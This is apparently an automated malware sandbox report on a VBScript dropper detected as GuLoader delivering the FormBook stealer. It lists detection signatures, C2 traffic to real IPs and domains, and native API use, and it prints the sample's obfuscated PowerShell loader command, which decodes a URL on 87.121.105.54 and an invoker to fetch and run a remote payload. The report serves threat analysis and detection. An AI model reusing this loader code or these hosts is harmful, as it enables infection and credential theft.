Windows Analysis Report
01105751.vbs

Overview

General Information

Sample name:	01105751.vbs renamed because original name is a hash value
Original sample name:	_20240501105751.vbs
Analysis ID:	1435413
MD5:	5c7e4886e009c7d2908ec633bf48cf8e
SHA1:	72e9f5c65571b19402febfa7f36fc6ee5ce9a0f3
SHA256:	c950aba2061fbb90b63122bec04b71764966e5554b6cd40114772c392464f748
Tags:	vbs
Infos:

Detection

FormBook, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Snort IDS alert for network traffic

VBScript performs obfuscated calls to suspicious functions

Yara detected FormBook

Yara detected GuLoader

Creates multiple autostart registry keys

Found direct / indirect Syscall (likely to bypass EDR)

Found suspicious powershell code related to unpacking or dynamic code loading

Hides threads from debuggers

Maps a DLL or memory area into another process

Queues an APC in another process (thread injection)

Sigma detected: WScript or CScript Dropper

Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes

Suspicious execution chain found

Suspicious powershell command line found

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Very long command line found

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Direct Autorun Keys Modification

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Sigma detected: Suspicious Copy From or To System Directory

Sigma detected: Suspicious Powershell In Registry Run Keys

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/ https://asec.ahnlab.com/en/32149/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Signatures

AV Detection

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png

URL Reputation: Label: malware

Yara detected FormBook

Source: Yara match	File source: 00000017.00000002.3568353158.0000000001500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.3568882333.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3231394969.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3306907165.0000000025560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.3568770287.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source:	Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdbV source: powershell.exe, 0000000B.00000002.2871144100.00000000074DD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5T source: powershell.exe, 0000000B.00000002.2871144100.0000000007400000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbn[ source: powershell.exe, 0000000B.00000002.2871144100.00000000074AA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5l source: powershell.exe, 0000000B.00000002.2871144100.0000000007400000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: wab.exe, xcopy.exe
Source:	Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.2871144100.00000000074E5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: xcopy.pdb source: wab.exe

Source: C:\Windows\SysWOW64\xcopy.exe

Code function: 22_2_02F4B7A0 FindFirstFileW,FindNextFileW,FindClose,

22_2_02F4B7A0

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Windows\SysWOW64\xcopy.exe

Code function: 4x nop then xor eax, eax

22_2_02F393E0

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49725 -> 34.174.122.2:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49727 -> 3.33.130.190:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49728 -> 3.33.130.190:80

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\wscript.exe

Process created: C:\Windows\System32\PING.EXE ping google.com -n 1

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: ATGS-MMD-ASUS ATGS-MMD-ASUS

Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown	TCP traffic detected without corresponding DNS query: 87.121.105.54

Source: global traffic	HTTP traffic detected: GET /Ommestrup.deploy HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.54Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /iYbZIhIVLPBjJUzImyrJN72.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.54Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /gnto/?P2v=kzXtiRyPGhR4rzp&4v8xJ8=F2aKH/UhYyQy5bhtG47arqZTAzYBZHKo8pZvH2jiqbKPAiUNCKzfvPloMCIQjvvo+O//vWhBzU38U00+OJnukLQGsUBXCgymNTKCViCR5sTiLbhUlqXxexqjYjSB6xlfqI4lO2I= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.facesofhoustontx.comConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4

Source: global traffic	DNS traffic detected: DNS query: google.com
Source: global traffic	DNS traffic detected: DNS query: www.facesofhoustontx.com
Source: global traffic	DNS traffic detected: DNS query: www.timesrenewables.com

Source: powershell.exe, 00000008.00000002.3288836081.000001EF28FF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3288836081.000001EF2AE16000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://87.121.105.54
Source: powershell.exe, 00000008.00000002.3288836081.000001EF28FF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://87.121.105.54/Ommestrup.deployP
Source: powershell.exe, 00000008.00000002.3288836081.000001EF2AFCA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://87.121.H
Source: wscript.exe, 00000000.00000003.2228249019.0000022CBEC96000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2227533901.0000022CBEC2E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2228795588.0000022CBEC96000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: wscript.exe, 00000000.00000002.2228998163.0000022CC0B70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000003.2183539052.0000022CC0BA9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2182822284.0000022CC0BFE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2183808324.0000022CC0BD1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?ae76aada72762
Source: wscript.exe, 00000000.00000003.2183539052.0000022CC0BA9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2223236655.0000022CC0BD1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2183808324.0000022CC0BD1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?ae76aada72
Source: powershell.exe, 00000008.00000002.3522392723.000001EF38E41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000008.00000002.3288836081.000001EF28FF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.3288836081.000001EF28DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000008.00000002.3288836081.000001EF28FF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000008.00000002.3288836081.000001EF28DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000008.00000002.3522392723.000001EF38E41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.3522392723.000001EF38E41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.3522392723.000001EF38E41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000008.00000002.3288836081.000001EF28FF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000008.00000002.3288836081.000001EF2A2CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000008.00000002.3522392723.000001EF38E41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 00000017.00000002.3568353158.0000000001500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.3568882333.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3231394969.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3306907165.0000000025560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.3568770287.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi64_5692.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi32_6096.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: 00000017.00000002.3568353158.0000000001500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000016.00000002.3568882333.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.3231394969.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000015.00000002.3568923150.00000000038D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.3306907165.0000000025560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000016.00000002.3568770287.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: powershell.exe PID: 5692, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 7566
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 7566
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 7566	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 7566	Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Retorsionshandlingenllustrationer = 1;$Elytrigerous='S';$Elytrigerous+='ubstrin';$Elytrigerous+='g';Function Programregningsfunktionens($Ridderne){$Retorsionshandlingennfraocular=$Ridderne.Length-$Retorsionshandlingenllustrationer;For($Retorsionshandlingen=5; $Retorsionshandlingen -lt $Retorsionshandlingennfraocular; $Retorsionshandlingen+=(6)){$Outsmokes+=$Ridderne.$Elytrigerous.Invoke( $Retorsionshandlingen, $Retorsionshandlingenllustrationer);}$Outsmokes;}function Gracy216($Begrendes){. ($Antediluvianske) ($Begrendes);}$Diskoskasteren=Programregningsfunktionens 's.perM L deoLandszAccomiTurbolBrystlSu.loa Inte/Linje5.ilfo.Brneb0B,ddi illi(MamelWKortsiExoranBowkndSp,dho.urvew,ndtrsFjase utotNmilepTb,een marga1San.u0Balli.Montr0H,rsk;.ykke BrakpWxanthi ,ervnReprs6trova4Filet;D,awc vidnxT,gue6Admin4Cotra;Insci Un btrTogstvEgipt:Inter1Riv l2For e1 daun. Gens0Sknde)Neutr Trak GRepudeGuldkc BelakTandloV.rde/ edb2Uheld0Sknhe1Elek.0Nell,0 ,rot1Un,en0Skibi1savne MordFautogiKo,merDe,inearom,fShipboHapaxxStork/Inten1Splas2Ds,es1 ilsk.Fylds0Capri ';$Sprayens=Programregningsfunktionens 'NondeU rubasVa neeBe,kir For -,geblAR.bbegholose Ta dn ParatPrivi ';$Reprogrammes=Programregningsfunktionens 'Stuf.hL.muctVersit SubspCosmo:etcif/Taksa/ Impl8Morph7Far,n.Bronz1Anal,2proc,1Ungl .unpol1Unper0F,nda5varmt. Gr,n5Roc,e4,sent/SeksaOOverrmMismamT.buleLandlsForcetmis,arAtropuDiscop,iske.AarsadUnsanesaanipBrodflDiameonamatySawai ';$Kretidseffekternes=Programregningsfunktionens 'Vejkr>Phisa ';$Antediluvianske=Programregningsfunktionens 'Etam.iRaadie saddxFasts ';$Gunlaying='Forraadnelig';Gracy216 (Programregningsfunktionens ' L urS AtikeSignatRecon- geneCPen,eo.endrnNovumtPrintelailanPorphtSt ir Peatw-AngloPObitaa elvetSymbohP,esh TrvemT,ough: ,aad\ Afv I Cerid.roldrCheskt UdpasFilerfMenneo C,lorsol,ceSuavenphaneiIndlenAabengSeepssUnche1Pre i9Wi,db7Super.RadiotNiveax t rrt Duod Evole-Un mmV selraMoraklPericuUnmoueAdvoc Melle$samstG estiu AppenRe,orl TeleaAnmrkySaponiImmunn BehvgAh.eh;Chabo ');Gracy216 (Programregningsfunktionens ' FramiHabi,fCacos larit( GrectV.stfe.olfisTalertRidge-OzonopJu iaaStoddtTabarhPigl, Pse THaand:Mosen\KomplI .oemd ilker tigetEperosKrig,f ColloPl.udr SubseMad lnNonmoiKromgnEnok g SaxosHaand1 Twir9Op oe7 Lov..Fedtst An txfarvet Rede) rtss{ Ka.me KropxFaksiiUdsket Sang} Un s; Gro, ');$Kvrne = Programregningsfunktionens 'NedraeUnconcUan.ghPet ooPaatn Munke%Kys.eaCasanpfy,depSixpedOver aGravit orema Ragl%Euboe\DevelS LovgaLaa,ngPlat sNematgBug.gn JalaiTegninOvercgArbe.eSl,knr Forsn p.ileafsvo. UnshISpirinM lartH ved .fsla&Neonr&Be.ri AdiabeTro ecUdganhSvovloeksp Trink$Ambol ';Gracy216 (Programregningsfunktionens 'Slide$SvmnigImperlAvn,soT aadb Rag,aPie alFordr: DemiVGoogoiQuittrShop k TrknsMycetofodbomHomemhDr sieEffemd De,isdawsst Bf eyOprikpBrancePatrunSongbs Thri=Nonam(Am.utcPillamSulted Stev Toksi/ ilhecRajah bed
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Retorsionshandlingenllustrationer = 1;$Elytrigerous='S';$Elytrigerous+='ubstrin';$Elytrigerous+='g';Function Programregningsfunktionens($Ridderne){$Retorsionshandlingennfraocular=$Ridderne.Length-$Retorsionshandlingenllustrationer;For($Retorsionshandlingen=5; $Retorsionshandlingen -lt $Retorsionshandlingennfraocular; $Retorsionshandlingen+=(6)){$Outsmokes+=$Ridderne.$Elytrigerous.Invoke( $Retorsionshandlingen, $Retorsionshandlingenllustrationer);}$Outsmokes;}function Gracy216($Begrendes){. ($Antediluvianske) ($Begrendes);}$Diskoskasteren=Programregningsfunktionens 's.perM L deoLandszAccomiTurbolBrystlSu.loa Inte/Linje5.ilfo.Brneb0B,ddi illi(MamelWKortsiExoranBowkndSp,dho.urvew,ndtrsFjase utotNmilepTb,een marga1San.u0Balli.Montr0H,rsk;.ykke BrakpWxanthi ,ervnReprs6trova4Filet;D,awc vidnxT,gue6Admin4Cotra;Insci Un btrTogstvEgipt:Inter1Riv l2For e1 daun. Gens0Sknde)Neutr Trak GRepudeGuldkc BelakTandloV.rde/ edb2Uheld0Sknhe1Elek.0Nell,0 ,rot1Un,en0Skibi1savne MordFautogiKo,merDe,inearom,fShipboHapaxxStork/Inten1Splas2Ds,es1 ilsk.Fylds0Capri ';$Sprayens=Programregningsfunktionens 'NondeU rubasVa neeBe,kir For -,geblAR.bbegholose Ta dn ParatPrivi ';$Reprogrammes=Programregningsfunktionens 'Stuf.hL.muctVersit SubspCosmo:etcif/Taksa/ Impl8Morph7Far,n.Bronz1Anal,2proc,1Ungl .unpol1Unper0F,nda5varmt. Gr,n5Roc,e4,sent/SeksaOOverrmMismamT.buleLandlsForcetmis,arAtropuDiscop,iske.AarsadUnsanesaanipBrodflDiameonamatySawai ';$Kretidseffekternes=Programregningsfunktionens 'Vejkr>Phisa ';$Antediluvianske=Programregningsfunktionens 'Etam.iRaadie saddxFasts ';$Gunlaying='Forraadnelig';Gracy216 (Programregningsfunktionens ' L urS AtikeSignatRecon- geneCPen,eo.endrnNovumtPrintelailanPorphtSt ir Peatw-AngloPObitaa elvetSymbohP,esh TrvemT,ough: ,aad\ Afv I Cerid.roldrCheskt UdpasFilerfMenneo C,lorsol,ceSuavenphaneiIndlenAabengSeepssUnche1Pre i9Wi,db7Super.RadiotNiveax t rrt Duod Evole-Un mmV selraMoraklPericuUnmoueAdvoc Melle$samstG estiu AppenRe,orl TeleaAnmrkySaponiImmunn BehvgAh.eh;Chabo ');Gracy216 (Programregningsfunktionens ' FramiHabi,fCacos larit( GrectV.stfe.olfisTalertRidge-OzonopJu iaaStoddtTabarhPigl, Pse THaand:Mosen\KomplI .oemd ilker tigetEperosKrig,f ColloPl.udr SubseMad lnNonmoiKromgnEnok g SaxosHaand1 Twir9Op oe7 Lov..Fedtst An txfarvet Rede) rtss{ Ka.me KropxFaksiiUdsket Sang} Un s; Gro, ');$Kvrne = Programregningsfunktionens 'NedraeUnconcUan.ghPet ooPaatn Munke%Kys.eaCasanpfy,depSixpedOver aGravit orema Ragl%Euboe\DevelS LovgaLaa,ngPlat sNematgBug.gn JalaiTegninOvercgArbe.eSl,knr Forsn p.ileafsvo. UnshISpirinM lartH ved .fsla&Neonr&Be.ri AdiabeTro ecUdganhSvovloeksp Trink$Ambol ';Gracy216 (Programregningsfunktionens 'Slide$SvmnigImperlAvn,soT aadb Rag,aPie alFordr: DemiVGoogoiQuittrShop k TrknsMycetofodbomHomemhDr sieEffemd De,isdawsst Bf eyOprikpBrancePatrunSongbs Thri=Nonam(Am.utcPillamSulted Stev Toksi/ ilhecRajah bed	Jump to behavior

Contains functionality to call native functions

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_248835C0 NtCreateMutant,LdrInitializeThunk,	17_2_248835C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_24882DF0 NtQuerySystemInformation,LdrInitializeThunk,	17_2_24882DF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_24882B60 NtClose,LdrInitializeThunk,	17_2_24882B60
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_24882C70 NtFreeVirtualMemory,LdrInitializeThunk,	17_2_24882C70
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_24882B80 NtQueryInformationFile,	17_2_24882B80
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_24882E80 NtReadVirtualMemory,	17_2_24882E80
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_24882F90 NtProtectVirtualMemory,	17_2_24882F90
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_24883090 NtSetValueKey,	17_2_24883090
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_24882BA0 NtEnumerateValueKey,	17_2_24882BA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_24882CA0 NtQueryInformationToken,	17_2_24882CA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_24882EA0 NtAdjustPrivilegesToken,	17_2_24882EA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_24882FA0 NtQuerySection,	17_2_24882FA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_24882AB0 NtWaitForSingleObject,	17_2_24882AB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_24882DB0 NtEnumerateKey,	17_2_24882DB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_24882FB0 NtResumeThread,	17_2_24882FB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_248839B0 NtGetContextThread,	17_2_248839B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_24882CC0 NtQueryVirtualMemory,	17_2_24882CC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_24882AD0 NtReadFile,	17_2_24882AD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_24882DD0 NtDelayExecution,	17_2_24882DD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_24882BE0 NtQueryValueKey,	17_2_24882BE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_24882EE0 NtQueueApcThread,	17_2_24882EE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_24882FE0 NtCreateFile,	17_2_24882FE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 17_2_24882BF0 NtAllocateVirtualMemory,	17_2_24882BF0
